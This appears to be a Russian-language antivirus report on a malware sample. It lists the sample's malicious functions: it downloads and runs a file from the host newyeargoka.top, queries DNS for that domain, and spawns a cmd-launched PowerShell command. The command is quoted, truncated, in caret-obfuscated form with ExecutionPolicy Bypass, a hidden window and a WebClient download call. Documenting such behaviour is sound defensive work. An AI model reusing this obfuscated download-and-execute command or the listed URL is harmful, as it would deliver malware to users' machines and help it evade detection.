Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "poWe^rSHElL.e^X^E -E^Xe^CUtI^OnP^O^Li^Cy^ BYPA^Ss^ -^N^op^R^Of^iLe -Wi^NDO^Ws^tyLe h^ID^d^E^n (^Ne^w-oBjEC^T^ sYS^TEM.n^Et^.We^B^C^LiEN^T)^.d^oW^nloa^dfIle('http://newyeargoka.to...
Сетевая активность
UDP
- DNS ASK ne###argoka.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "poWe^rSHElL.e^X^E -E^Xe^CUtI^OnP^O^Li^Cy^ BYPA^Ss^ -^N^op^R^Of^iLe -Wi^NDO^Ws^tyLe h^ID^d^E^n (^Ne^w-oBjEC^T^ sYS^TEM.n^Et^.We^B^C^LiEN^T)^.d^oW^nloa^dfIle('http://newyeargoka.to...' (со скрытым окном)
